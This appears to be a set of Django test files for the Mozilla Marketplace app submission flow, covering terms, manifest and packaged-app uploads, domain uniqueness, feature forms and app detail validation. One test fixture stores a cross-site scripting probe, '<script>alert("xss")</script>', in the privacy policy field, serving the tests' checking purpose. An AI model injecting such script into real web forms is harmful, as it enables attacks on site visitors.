amo.tests.app_factory(app_domain='app://hy.fr')
form = forms.NewWebappVersionForm(
{'upload': self.file.uuid}, request=self.request, is_packaged=True,
addon=app)
assert not form.is_valid(), form.errors
assert 'An app already exists' in ''.join(form.errors['upload'])
class TestAppDetailsBasicForm(amo.tests.TestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
self.request = mock.Mock()
self.request.amo_user = UserProfile.objects.get(id=999)
def test_slug(self):
app = Webapp.objects.get(pk=337141)
data = {
'app_slug': 'thisIsAslug',
'description': '.',
'privacy_policy': '.',
'support_email': '[email protected]',
}
form = forms.AppDetailsBasicForm(data, request=self.request,
instance=app)
assert form.is_valid()
form.save()
eq_(app.app_slug, 'thisisaslug')
class TestAppFeaturesForm(amo.tests.TestCase):
fixtures = fixture('user_999', 'webapp_337141')
def setUp(self):
amo.set_user(UserProfile.objects.all()[0])
self.form = forms.AppFeaturesForm()
self.app = Webapp.objects.get(pk=337141)
self.features = self.app.current_version.features
def _check_log(self, action):
assert AppLog.objects.filter(
addon=self.app, activity_log__action=action.id).exists(), (
"Didn't find `%s` action in logs." % action.short)
def test_required(self):
f_names = self.form.fields.keys()
for value in (True, False):
form = forms.AppFeaturesForm(dict((n, value) for n in f_names))
eq_(form.is_valid(), True, form.errors)
def test_correct_fields(self):
fields = self.form.fields
f_values = fields.values()
assert 'version' not in fields
assert all(isinstance(f, BooleanField) for f in f_values)
self.assertSetEqual(fields, AppFeatures()._fields())
def test_required_api_fields(self):
fields = [f.help_text for f in self.form.required_api_fields()]
eq_(fields, sorted(f['name'] for f in APP_FEATURES.values()))
def test_required_api_fields_nonascii(self):
forms.AppFeaturesForm.base_fields['has_apps'].help_text = _(
u'H\xe9llo')
fields = [f.help_text for f in self.form.required_api_fields()]
eq_(fields, sorted(f['name'] for f in APP_FEATURES.values()))
def test_changes_mark_for_rereview(self):
self.features.update(has_sms=True)
data = {'has_apps': True}
self.form = forms.AppFeaturesForm(instance=self.features, data=data)
self.form.save()
ok_(self.features.has_apps)
ok_(not self.features.has_sms)
ok_(not self.features.has_contacts)
action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
assert AppLog.objects.filter(addon=self.app,
activity_log__action=action_id).exists()
eq_(RereviewQueue.objects.count(), 1)
def test_no_changes_not_marked_for_rereview(self):
self.features.update(has_sms=True)
data = {'has_sms': True}
self.form = forms.AppFeaturesForm(instance=self.features, data=data)
self.form.save()
ok_(not self.features.has_apps)
ok_(self.features.has_sms)
eq_(RereviewQueue.objects.count(), 0)
action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
assert not AppLog.objects.filter(addon=self.app,
activity_log__action=action_id).exists()
def test_changes_mark_for_rereview_bypass(self):
self.features.update(has_sms=True)
data = {'has_apps': True}
self.form = forms.AppFeaturesForm(instance=self.features, data=data)
self.form.save(mark_for_rereview=False)
ok_(self.features.has_apps)
ok_(not self.features.has_sms)
eq_(RereviewQueue.objects.count(), 0)
action_id = amo.LOG.REREVIEW_FEATURES_CHANGED.id
assert not AppLog.objects.filter(addon=self.app,
activity_log__action=action_id).exists()
########NEW FILE########
__FILENAME__ = test_models
from nose.tools import eq_
import amo
import amo.tests
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import Webapp
from mkt.site.fixtures import fixture
class TestAppSubmissionChecklist(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.webapp = Webapp.objects.get(id=337141)
self.cl = AppSubmissionChecklist.objects.create(addon=self.webapp)
def test_default(self):
eq_(self.cl.get_completed(), [])
def test_terms(self):
self.cl.update(terms=True)
eq_(self.cl.get_completed(), ['terms'])
def test_manifest(self):
self.cl.update(terms=True, manifest=True)
eq_(self.cl.get_completed(), ['terms', 'manifest'])
def test_details(self):
self.cl.update(terms=True, manifest=True, details=True)
eq_(self.cl.get_completed(), ['terms', 'manifest', 'details'])
def test_next_details(self):
self.cl.update(terms=True, manifest=True)
eq_(self.cl.get_next(), 'details')
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import datetime
import json
import os
import shutil
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
import amo
import amo.tests
import mkt
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonUser,
Category)
from amo.tests import formset, initial
from amo.tests.test_helpers import get_image_path
from apps.users.models import UserNotification
from apps.users.notifications import app_surveys
from constants.applications import DEVICE_TYPES
from mkt.files.tests.test_models import UploadTest as BaseUploadTest
from mkt.site.fixtures import fixture
from mkt.submit.decorators import read_dev_agreement_required
from mkt.submit.forms import AppFeaturesForm, NewWebappVersionForm
from mkt.submit.models import AppSubmissionChecklist
from mkt.webapps.models import AppFeatures, Webapp
from translations.models import Translation
from users.models import UserProfile
class TestSubmit(amo.tests.TestCase):
fixtures = fixture('user_999')
def setUp(self):
self.fi_mock = mock.patch(
'mkt.developers.tasks.fetch_icon').__enter__()
self.user = self.get_user()
assert self.client.login(username=self.user.email, password='password')
def tearDown(self):
self.fi_mock.__exit__()
def get_user(self):
return UserProfile.objects.get(username='regularuser')
def get_url(self, url):
return reverse('submit.app.%s' % url, args=[self.webapp.app_slug])
def _test_anonymous(self):
self.client.logout()
r = self.client.get(self.url, follow=True)
self.assertLoginRedirects(r, self.url)
def _test_progress_display(self, completed, current):
"""Test that the correct steps are highlighted."""
r = self.client.get(self.url)
progress = pq(r.content)('#submission-progress')
# Check the completed steps.
completed_found = progress.find('.completed')
for idx, step in enumerate(completed):
li = completed_found.eq(idx)
eq_(li.text(), unicode(mkt.APP_STEPS_TITLE[step]))
# Check that we link back to the Developer Agreement.
terms_link = progress.find('.terms a')
if 'terms' in completed:
eq_(terms_link.attr('href'),
reverse('mkt.developers.docs', args=['policies', 'agreement']))
else:
eq_(terms_link.length, 0)
# Check the current step.
eq_(progress.find('.current').text(),
unicode(mkt.APP_STEPS_TITLE[current]))
class TestProceed(TestSubmit):
def setUp(self):
super(TestProceed, self).setUp()
self.user.update(read_dev_agreement=None)
self.url = reverse('submit.app')
def test_is_authenticated(self):
# Redirect user to Terms.
r = self.client.get(self.url)
self.assert3xx(r, reverse('submit.app.terms'))
def test_is_anonymous(self):
# Show user to Terms page but with the login prompt.
self.client.logout()
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(r.context['proceed'], True)
class TestTerms(TestSubmit):
def setUp(self):
super(TestTerms, self).setUp()
self.user.update(read_dev_agreement=None)
self.url = reverse('submit.app.terms')
def test_anonymous(self):
self.client.logout()
r = self.client.get(self.url, follow=True)
self.assertLoginRedirects(r, self.url)
def test_jump_to_step(self):
r = self.client.get(reverse('submit.app'), follow=True)
self.assert3xx(r, self.url)
def test_page(self):
r = self.client.get(self.url)
eq_(r.status_code, 200)
doc = pq(r.content)('#submit-terms')
eq_(doc.length, 1)
eq_(doc.find('input[name=newsletter]').siblings('label').length, 1,
'Missing its <label>!')
def test_progress_display(self):
self._test_progress_display([], 'terms')
@mock.patch('basket.subscribe')
def test_agree(self, subscribe_mock):
self.client.post(self.url, {'read_dev_agreement': True})
dt = self.get_user().read_dev_agreement
self.assertCloseToNow(dt)
eq_(UserNotification.objects.count(), 0)
assert not subscribe_mock.called
@mock.patch('basket.subscribe')
def test_agree_and_sign_me_up(self, subscribe_mock):
self.client.post(self.url, {'read_dev_agreement':
datetime.datetime.now(),
'newsletter': True})
dt = self.get_user().read_dev_agreement
self.assertCloseToNow(dt)
eq_(UserNotification.objects.count(), 1)
notes = UserNotification.objects.filter(user=self.user, enabled=True,
notification_id=app_surveys.id)
eq_(notes.count(), 1, 'Expected to not be subscribed to newsletter')
subscribe_mock.assert_called_with(
self.user.email, 'app-dev', lang='en-US',
country='restofworld', format='H',
source_url='http://testserver/developers/submit')
def test_disagree(self):
r = self.client.post(self.url)
eq_(r.status_code, 200)
eq_(self.user.read_dev_agreement, None)
eq_(UserNotification.objects.count(), 0)
def test_read_dev_agreement_required(self):
f = mock.Mock()
f.__name__ = 'function'
request = mock.Mock()
request.amo_user.read_dev_agreement = None
request.get_full_path.return_value = self.url
func = read_dev_agreement_required(f)
res = func(request)
assert not f.called
eq_(res.status_code, 302)
eq_(res['Location'], reverse('submit.app'))
class TestManifest(TestSubmit):
def setUp(self):
super(TestManifest, self).setUp()
self.user.update(read_dev_agreement=None)
self.url = reverse('submit.app')
def _step(self):
self.user.update(read_dev_agreement=datetime.datetime.now())
def test_anonymous(self):
r = self.client.get(self.url, follow=True)
eq_(r.context['step'], 'terms')
def test_cannot_skip_prior_step(self):
r = self.client.get(self.url, follow=True)
# And we start back at one...
self.assert3xx(r, reverse('submit.app.terms'))
def test_jump_to_step(self):
# I already read the Terms.
self._step()
# So jump me to the Manifest step.
r = self.client.get(reverse('submit.app'), follow=True)
eq_(r.context['step'], 'manifest')
def test_legacy_redirects(self):
def check():
for before, status in redirects:
r = self.client.get(before, follow=True)
self.assert3xx(r, dest, status)
# I haven't read the dev agreement.
redirects = (
('/developers/submit/', 302),
('/developers/submit/app', 302),
('/developers/submit/app/terms', 302),
('/developers/submit/app/manifest', 302),
)
dest = '/developers/submit/terms'
check()
# I have read the dev agreement.
self._step()
redirects = (
('/developers/submit/app', 302),
('/developers/submit/app/terms', 302),
('/developers/submit/app/manifest', 302),
('/developers/submit/manifest', 301),
)
dest = '/developers/submit/'
check()
def test_page(self):
self._step()
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('#upload-file').length, 1)
def test_progress_display(self):
self._step()
self._test_progress_display(['terms'], 'manifest')
class UploadAddon(object):
def post(self, expect_errors=False, data=None):
if data is None:
data = {'free_platforms': ['free-desktop']}
data.update(upload=self.upload.pk)
r = self.client.post(self.url, data, follow=True)
eq_(r.status_code, 200)
if not expect_errors:
# Show any unexpected form errors.
if r.context and 'form' in r.context:
eq_(r.context['form'].errors, {})
return r
class BaseWebAppTest(BaseUploadTest, UploadAddon, amo.tests.TestCase):
fixtures = fixture('app_firefox', 'platform_all', 'user_999', 'user_10482')
def setUp(self):
super(BaseWebAppTest, self).setUp()
self.manifest = self.manifest_path('mozball.webapp')
self.manifest_url = 'http://allizom.org/mozball.webapp'
self.upload = self.get_upload(abspath=self.manifest)
self.upload.update(name=self.manifest_url, is_webapp=True)
self.url = reverse('submit.app')
assert self.client.login(username='[email protected]',
password='password')
def post_addon(self, data=None):
eq_(Addon.objects.count(), 0)
self.post(data=data)
return Addon.objects.get()
class TestCreateWebApp(BaseWebAppTest):
@mock.patch('mkt.developers.tasks.fetch_icon')
def test_post_app_redirect(self, fi_mock):
r = self.post()
webapp = Webapp.objects.get()
self.assert3xx(r,
reverse('submit.app.details', args=[webapp.app_slug]))
assert fi_mock.delay.called, (
'The fetch_icon task was expected to be called')
def test_no_hint(self):
self.post_addon()
self.upload = self.get_upload(abspath=self.manifest)
r = self.client.post(reverse('mkt.developers.upload_manifest'),
dict(manifest=self.manifest_url), follow=True)
eq_(r.status_code, 200)
assert 'already submitted' not in r.content, (
'Unexpected helpful error (trap_duplicate)')
assert 'already exists' not in r.content, (
'Unexpected validation error (verify_app_domain)')
def test_no_upload(self):
data = {'free_platforms': ['free-desktop']}
res = self.client.post(self.url, data, follow=True)
eq_(res.context['form'].errors,
{'upload': NewWebappVersionForm.upload_error})
@mock.patch('mkt.developers.tasks.fetch_icon')
def test_bad_upload(self, fi_mock):
data = {'free_platforms': ['free-desktop'], 'upload': 'foo'}
res = self.client.post(self.url, data, follow=True)
eq_(res.context['form'].errors,
{'upload': NewWebappVersionForm.upload_error})
assert not fi_mock.delay.called, (
'The fetch_icon task was not expected to be called')
def test_hint_for_same_manifest(self):
self.create_switch(name='webapps-unique-by-domain')
self.post_addon()
self.upload = self.get_upload(abspath=self.manifest)
r = self.client.post(reverse('mkt.developers.upload_manifest'),
dict(manifest=self.manifest_url))
data = json.loads(r.content)
assert 'Oops' in data['validation']['messages'][0]['message'], (
'Expected oops')
def test_no_hint_for_same_manifest_different_author(self):
self.create_switch(name='webapps-unique-by-domain')
self.post_addon()
# Submit same manifest as different user.
assert self.client.login(username='[email protected]',
password='password')
self.upload = self.get_upload(abspath=self.manifest)
r = self.client.post(reverse('mkt.developers.upload_manifest'),
dict(manifest=self.manifest_url))
data = json.loads(r.content)
eq_(data['validation']['messages'][0]['message'],
'An app already exists on this domain; only one app per domain is '
'allowed.')
def test_app_from_uploaded_manifest(self):
addon = self.post_addon()
eq_(addon.type, amo.ADDON_WEBAPP)
eq_(addon.is_packaged, False)
assert addon.guid is not None, (
'Expected app to have a UUID assigned to guid')
eq_(unicode(addon.name), u'MozillaBall ょ')
eq_(addon.slug, 'app-%s' % addon.id)
eq_(addon.app_slug, u'mozillaball-ょ')
eq_(addon.description, u'Exciting Open Web development action!')
eq_(addon.manifest_url, u'http://allizom.org/mozball.webapp')
eq_(addon.app_domain, u'http://allizom.org')
eq_(Translation.objects.get(id=addon.description.id, locale='it'),
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(addon.current_version.developer_name, 'Mozilla Labs')
eq_(addon.current_version.manifest,
json.loads(open(self.manifest).read()))
def test_manifest_with_any_extension(self):
self.manifest = os.path.join(settings.ROOT, 'mkt', 'developers',
'tests', 'addons', 'mozball.owa')
self.upload = self.get_upload(abspath=self.manifest, is_webapp=True)
addon = self.post_addon()
eq_(addon.type, amo.ADDON_WEBAPP)
def test_version_from_uploaded_manifest(self):
addon = self.post_addon()
eq_(addon.current_version.version, '1.0')
def test_file_from_uploaded_manifest(self):
addon = self.post_addon()
files = addon.current_version.files.all()
eq_(len(files), 1)
eq_(files[0].status, amo.STATUS_PENDING)
def test_set_platform(self):
app = self.post_addon(
{'free_platforms': ['free-android-tablet', 'free-desktop']})
self.assertSetEqual(app.device_types,
[amo.DEVICE_TABLET, amo.DEVICE_DESKTOP])
def test_free(self):
app = self.post_addon({'free_platforms': ['free-firefoxos']})
self.assertSetEqual(app.device_types, [amo.DEVICE_GAIA])
eq_(app.premium_type, amo.ADDON_FREE)
def test_premium(self):
self.create_flag('allow-b2g-paid-submission')
app = self.post_addon({'paid_platforms': ['paid-firefoxos']})
self.assertSetEqual(app.device_types, [amo.DEVICE_GAIA])
eq_(app.premium_type, amo.ADDON_PREMIUM)
def test_supported_locales(self):
addon = self.post_addon()
eq_(addon.default_locale, 'en-US')
eq_(addon.versions.latest().supported_locales, 'es,it')
def test_short_locale(self):
# This manifest has a locale code of "pt" which is in the
# SHORTER_LANGUAGES setting and should get converted to "pt-PT".
self.manifest = self.manifest_path('short-locale.webapp')
self.upload = self.get_upload(abspath=self.manifest)
addon = self.post_addon()
eq_(addon.default_locale, 'pt-PT')
eq_(addon.versions.latest().supported_locales, 'es')
def test_unsupported_detail_locale(self):
# This manifest has a locale code of "en-GB" which is unsupported, so
# we default to "en-US".
self.manifest = self.manifest_path('unsupported-default-locale.webapp')
self.upload = self.get_upload(abspath=self.manifest)
addon = self.post_addon()
eq_(addon.default_locale, 'en-US')
eq_(addon.versions.latest().supported_locales, 'es,it')
def test_appfeatures_creation(self):
addon = self.post_addon(data={
'free_platforms': ['free-desktop'],
'has_contacts': 'on'
})
features = addon.current_version.features
ok_(isinstance(features, AppFeatures))
field_names = [f.name for f in AppFeaturesForm().all_fields()]
for field in field_names:
expected = field == 'has_contacts'
eq_(getattr(features, field), expected)
class TestCreateWebAppFromManifest(BaseWebAppTest):
def setUp(self):
super(TestCreateWebAppFromManifest, self).setUp()
Webapp.objects.create(app_slug='xxx',
app_domain='http://existing-app.com')
def upload_webapp(self, manifest_url, **post_kw):
self.upload.update(name=manifest_url) # Simulate JS upload.
return self.post(**post_kw)
def post_manifest(self, manifest_url):
rs = self.client.post(reverse('mkt.developers.upload_manifest'),
dict(manifest=manifest_url))
if 'json' in rs['content-type']:
rs = json.loads(rs.content)
return rs
def test_duplicate_domain(self):
self.create_switch(name='webapps-unique-by-domain')
rs = self.upload_webapp('http://existing-app.com/my.webapp',
expect_errors=True)
eq_(rs.context['form'].errors,
{'upload':
['An app already exists on this domain; only one '
'app per domain is allowed.']})
def test_allow_duplicate_domains(self):
self.upload_webapp('http://existing-app.com/my.webapp') # No errors.
def test_duplicate_domain_from_js(self):
self.create_switch(name='webapps-unique-by-domain')
data = self.post_manifest('http://existing-app.com/my.webapp')
eq_(data['validation']['errors'], 1)
eq_(data['validation']['messages'][0]['message'],
'An app already exists on this domain; '
'only one app per domain is allowed.')
def test_allow_duplicate_domains_from_js(self):
rs = self.post_manifest('http://existing-app.com/my.webapp')
eq_(rs.status_code, 302)
class BasePackagedAppTest(BaseUploadTest, UploadAddon, amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'user_999')
def setUp(self):
super(BasePackagedAppTest, self).setUp()
self.app = Webapp.objects.get(pk=337141)
self.app.update(is_packaged=True)
self.version = self.app.current_version
self.file = self.version.all_files[0]
self.file.update(filename='mozball.zip')
self.package = self.packaged_app_path('mozball.zip')
self.upload = self.get_upload(abspath=self.package)
self.upload.update(name='mozball.zip', is_webapp=True)
self.url = reverse('submit.app')
assert self.client.login(username='[email protected]',
password='password')
def post_addon(self, data=None):
eq_(Addon.objects.count(), 1)
self.post(data=data)
return Addon.objects.order_by('-id')[0]
def setup_files(self, filename='mozball.zip'):
# Make sure the source file is there.
# Original packaged file.
if not storage.exists(self.file.file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path(filename),
self.file.file_path)
# Signed packaged file.
if not storage.exists(self.file.signed_file_path):
try:
# We don't care if these dirs exist.
os.makedirs(os.path.dirname(self.file.signed_file_path))
except OSError:
pass
shutil.copyfile(self.packaged_app_path(filename),
self.file.signed_file_path)
class TestCreatePackagedApp(BasePackagedAppTest):
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_post_app_redirect(self, _mock):
res = self.post()
webapp = Webapp.objects.order_by('-created')[0]
self.assert3xx(res,
reverse('submit.app.details', args=[webapp.app_slug]))
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
@mock.patch('mkt.submit.forms.verify_app_domain')
def test_app_from_uploaded_package(self, _verify, _mock):
addon = self.post_addon(
data={'packaged': True, 'free_platforms': ['free-firefoxos']})
eq_(addon.type, amo.ADDON_WEBAPP)
eq_(addon.current_version.version, '1.0')
eq_(addon.is_packaged, True)
assert addon.guid is not None, (
'Expected app to have a UUID assigned to guid')
eq_(unicode(addon.name), u'Packaged MozillaBall ょ')
eq_(addon.slug, 'app-%s' % addon.id)
eq_(addon.app_slug, u'packaged-mozillaball-ょ')
eq_(addon.description, u'Exciting Open Web development action!')
eq_(addon.manifest_url, None)
eq_(addon.app_domain, 'app://hy.fr')
eq_(Translation.objects.get(id=addon.description.id, locale='it'),
u'Azione aperta emozionante di sviluppo di fotoricettore!')
eq_(addon.current_version.developer_name, 'Mozilla Labs')
assert _verify.called, (
'`verify_app_domain` should be called for packaged apps with '
'origins.')
@mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
def test_packaged_app_not_unique(self, _mock):
Webapp.objects.create(is_packaged=True, app_domain='app://hy.fr')
res = self.post(
data={'packaged': True, 'free_platforms': ['free-firefoxos']},
expect_errors=True)
eq_(res.context['form'].errors, {
'upload': ['An app already exists on this domain; only one app '
'per domain is allowed.']})
class TestDetails(TestSubmit):
fixtures = fixture('webapp_337141', 'user_999', 'user_10482')
def setUp(self):
super(TestDetails, self).setUp()
self.webapp = self.get_webapp()
self.webapp.update(status=amo.STATUS_NULL)
self.url = reverse('submit.app.details', args=[self.webapp.app_slug])
def get_webapp(self):
return Webapp.objects.get(id=337141)
def upload_preview(self, image_file=None):
if not image_file:
image_file = get_image_path('preview.jpg')
return self._upload_image(self.webapp.get_dev_url('upload_preview'),
image_file=image_file)
def upload_icon(self, image_file=None):
if not image_file:
image_file = get_image_path('mozilla-sq.png')
return self._upload_image(self.webapp.get_dev_url('upload_icon'),
image_file=image_file)
def _upload_image(self, url, image_file):
with open(image_file, 'rb') as data:
rp = self.client.post(url, {'upload_image': data})
eq_(rp.status_code, 200)
hash_ = json.loads(rp.content)['upload_hash']
assert hash_, 'No hash: %s' % rp.content
return hash_
def _step(self):
self.user.update(read_dev_agreement=datetime.datetime.now())
self.cl = AppSubmissionChecklist.objects.create(addon=self.webapp,
terms=True, manifest=True)
# Associate app with user.
AddonUser.objects.create(addon=self.webapp, user=self.user)
# Associate device type with app.
self.dtype = DEVICE_TYPES.values()[0]
AddonDeviceType.objects.create(addon=self.webapp,
device_type=self.dtype.id)
self.device_types = [self.dtype]
# Associate category with app.
self.cat1 = Category.objects.create(type=amo.ADDON_WEBAPP, name='Fun')
AddonCategory.objects.create(addon=self.webapp, category=self.cat1)
def test_anonymous(self):
self._test_anonymous()
def test_resume_later(self):
self._step()
self.webapp.appsubmissionchecklist.update(details=True)
r = self.client.get(reverse('submit.app.resume',
args=[self.webapp.app_slug]))
self.assert3xx(r, self.webapp.get_dev_url('edit'))
def test_not_owner(self):
self._step()
assert self.client.login(username='[email protected]',
password='password')
eq_(self.client.get(self.url).status_code, 403)
def test_page(self):
self._step()
r = self.client.get(self.url)
eq_(r.status_code, 200)
eq_(pq(r.content)('#submit-details').length, 1)
def test_progress_display(self):
self._step()
self._test_progress_display(['terms', 'manifest'], 'details')
def new_preview_formset(self, *args, **kw):
ctx = self.client.get(self.url).context
blank = initial(ctx['form_previews'].forms[-1])
blank.update(**kw)
return blank
def preview_formset(self, *args, **kw):
kw.setdefault('initial_count', 0)
kw.setdefault('prefix', 'files')
fs = formset(*[a for a in args] + [self.new_preview_formset()], **kw)
return dict([(k, '' if v is None else v) for k, v in fs.items()])
def get_dict(self, **kw):
data = {
'app_slug': 'testname',
'description': 'desc',
'privacy_policy': 'XXX <script>alert("xss")</script>',
'homepage': 'http://www.goodreads.com/user/show/7595895-krupa',
'support_url': 'http://www.goodreads.com/user_challenges/351558',
'support_email': '[email protected]',
'categories': [self.cat1.id],
'flash': '1',
'publish': '1'
}
# Add the required screenshot.
data.update(self.preview_formset({
'upload_hash': '<hash>',
'position': 0
}))
data.update(**kw)
# Remove fields without values.
data = dict((k, v) for k, v in data.iteritems() if v is not None)
return data
def check_dict(self, data=None, expected=None):
if data is None:
data = self.get_dict()
addon = self.get_webapp()
# Build a dictionary of expected results.
expected_data = {
'app_slug': 'testname',
'description': 'desc',
'privacy_policy': 'XXX <script>alert("xss")</script>',
'uses_flash': True,
'make_public': amo.PUBLIC_IMMEDIATELY
}
if expected:
expected_data.update(expected)
for field, expected in expected_data.iteritems():
got = unicode(getattr(addon, field))
expected = unicode(expected)
eq_(got, expected,
'Expected %r for %r. Got %r.' % (expected, field, got))
self.assertSetEqual(addon.device_types, self.device_types)
@mock.patch('mkt.submit.views.record_action')
def test_success(self, record_action):
self._step()
data = self.get_dict()
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
self.check_dict(data=data)
self.webapp = self.get_webapp()
self.assert3xx(r, self.get_url('done'))
eq_(self.webapp.status, amo.STATUS_PENDING)
assert record_action.called
@mock.patch('mkt.submit.views.record_action')
def test_success_iarc(self, record_action):
"""TODO: delete the above test when cleaning up waffle."""
self.create_switch('iarc')
self._step()
data = self.get_dict()
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
self.check_dict(data=data)
self.webapp = self.get_webapp()
self.assert3xx(r, self.get_url('done'))
eq_(self.webapp.status, amo.STATUS_NULL)
assert record_action.called
def test_success_paid(self):
self._step()
self.webapp = self.get_webapp()
self.make_premium(self.webapp)
data = self.get_dict()
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
self.check_dict(data=data)
self.webapp = self.get_webapp()
self.assert3xx(r, self.get_url('done'))
eq_(self.webapp.status, amo.STATUS_NULL)
eq_(self.webapp.highest_status, amo.STATUS_PENDING)
def test_success_prefill_device_types_if_empty(self):
"""
The new submission flow asks for device types at step one.
This ensures that existing incomplete apps still have device
compatibility.
"""
self._step()
AddonDeviceType.objects.all().delete()
self.device_types = amo.DEVICE_TYPES.values()
data = self.get_dict()
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
self.check_dict(data=data)
self.webapp = self.get_webapp()
self.assert3xx(r, self.get_url('done'))
def test_success_for_public_waiting(self):
self._step()
data = self.get_dict()
del data['publish']
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
self.check_dict(data=data, expected={'make_public': amo.PUBLIC_WAIT})
self.webapp = self.get_webapp()
self.assert3xx(r, self.get_url('done'))
def test_media_types(self):
self._step()
res = self.client.get(self.url)
doc = pq(res.content)
eq_(doc('.screenshot_upload').attr('data-allowed-types'),
'image/jpeg|image/png|video/webm')
eq_(doc('#id_icon_upload').attr('data-allowed-types'),
'image/jpeg|image/png')
def test_screenshot(self):
self._step()
im_hash = self.upload_preview()
data = self.get_dict()
data.update(self.preview_formset({
'upload_hash': im_hash,
'position': 0
}))
rp = self.client.post(self.url, data)
eq_(rp.status_code, 302)
ad = Addon.objects.get(pk=self.webapp.pk)
eq_(ad.previews.all().count(), 1)
def test_icon(self):
self._step()
im_hash = self.upload_icon()
data = self.get_dict()
data['icon_upload_hash'] = im_hash
data['icon_type'] = 'image/png'
rp = self.client.post(self.url, data)
eq_(rp.status_code, 302)
ad = self.get_webapp()
eq_(ad.icon_type, 'image/png')
for size in amo.ADDON_ICON_SIZES:
fn = '%s-%s.png' % (ad.id, size)
assert os.path.exists(os.path.join(ad.get_icon_dir(), fn)), (
'Expected %s in %s' % (fn, os.listdir(ad.get_icon_dir())))
def test_screenshot_or_video_required(self):
self._step()
data = self.get_dict()
for k in data:
if k.startswith('files') and k.endswith('upload_hash'):
data[k] = ''
rp = self.client.post(self.url, data)
eq_(rp.context['form_previews'].non_form_errors(),
['You must upload at least one screenshot or video.'])
def test_unsaved_screenshot(self):
self._step()
# If there are form errors we should still pass the previews URIs.
preview_type = 'video/webm'
preview_uri = 'moz-filedata:p00p'
data = self.preview_formset({
'position': 1,
'upload_hash': '<hash_one>',
'unsaved_image_type': preview_type,
'unsaved_image_data': preview_uri
})
r = self.client.post(self.url, data)
eq_(r.status_code, 200)
form = pq(r.content)('form')
eq_(form.find('input[name=files-0-unsaved_image_type]').val(),
preview_type)
eq_(form.find('input[name=files-0-unsaved_image_data]').val(),
preview_uri)
def test_unique_allowed(self):
self._step()
r = self.client.post(self.url, self.get_dict(name=self.webapp.name))
self.assertNoFormErrors(r)
app = Webapp.objects.exclude(app_slug=self.webapp.app_slug)[0]
self.assert3xx(r, reverse('submit.app.done', args=[app.app_slug]))
eq_(self.get_webapp().status, amo.STATUS_PENDING)
def test_unique_allowed_iarc(self):
"""TODO: delete the above test when cleaning up waffle."""
self.create_switch('iarc')
self._step()
r = self.client.post(self.url, self.get_dict(name=self.webapp.name))
self.assertNoFormErrors(r)
app = Webapp.objects.exclude(app_slug=self.webapp.app_slug)[0]
self.assert3xx(r, reverse('submit.app.done', args=[app.app_slug]))
eq_(self.get_webapp().status, amo.STATUS_NULL)
def test_slug_invalid(self):
self._step()
# Submit an invalid slug.
d = self.get_dict(app_slug='slug!!! aksl23%%')
r = self.client.post(self.url, d)
eq_(r.status_code, 200)
self.assertFormError(r, 'form_basic', 'app_slug',
"Enter a valid 'slug' consisting of letters, numbers, underscores "
"or hyphens.")
def test_slug_required(self):
self._step()
r = self.client.post(self.url, self.get_dict(app_slug=''))
eq_(r.status_code, 200)
self.assertFormError(r, 'form_basic', 'app_slug',
'This field is required.')
def test_description_required(self):
self._step()
r = self.client.post(self.url, self.get_dict(description=''))
eq_(r.status_code, 200)
self.assertFormError(r, 'form_basic', 'description',
'This field is required.')
def test_privacy_policy_required(self):
self._step()
r = self.client.post(self.url, self.get_dict(privacy_policy=None))
self.assertFormError(r, 'form_basic', 'privacy_policy',
'This field is required.')
def test_clashing_locale(self):
self.webapp.default_locale = 'de'
self.webapp.save()
self._step()
self.client.cookies['current_locale'] = 'en-us'
data = self.get_dict(name=None, name_de='Test name',
privacy_policy=None,
**{'privacy_policy_en-us': 'XXX'})
r = self.client.post(self.url, data)
self.assertNoFormErrors(r)
def test_homepage_url_optional(self):
self._step()
r = self.client.post(self.url, self.get_dict(homepage=None))
self.assertNoFormErrors(r)
def test_homepage_url_invalid(self):
self._step()
r = self.client.post(self.url, self.get_dict(homepage='xxx'))
self.assertFormError(r, 'form_basic', 'homepage', 'Enter a valid URL.')
def test_support_url_optional(self):
self._step()
r = self.client.post(self.url, self.get_dict(support_url=None))
self.assertNoFormErrors(r)
def test_support_url_invalid(self):
self._step()
r = self.client.post(self.url, self.get_dict(support_url='xxx'))
self.assertFormError(r, 'form_basic', 'support_url',
'Enter a valid URL.')
def test_support_email_required(self):
self._step()
r = self.client.post(self.url, self.get_dict(support_email=None))
self.assertFormError(r, 'form_basic', 'support_email',
'This field is required.')
def test_support_email_invalid(self):
self._step()
r = self.client.post(self.url, self.get_dict(support_email='xxx'))
self.assertFormError(r, 'form_basic', 'support_email',
'Enter a valid email address.')
def test_categories_required(self):
self._step()
r = self.client.post(self.url, self.get_dict(categories=[]))
eq_(r.context['form_cats'].errors['categories'],
['This field is required.'])
def test_categories_max(self):
self._step()
eq_(amo.MAX_CATEGORIES, 2)
cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, name='bling')
cat3 = Category.objects.create(type=amo.ADDON_WEBAPP, name='blang')
cats = [self.cat1.id, cat2.id, cat3.id]
r = self.client.post(self.url, self.get_dict(categories=cats))
eq_(r.context['form_cats'].errors['categories'],
['You can have only 2 categories.'])
def _post_cats(self, cats):
self.client.post(self.url, self.get_dict(categories=cats))
eq_(sorted(self.get_webapp().categories.values_list('id', flat=True)),
sorted(cats))
def test_categories_add(self):
self._step()
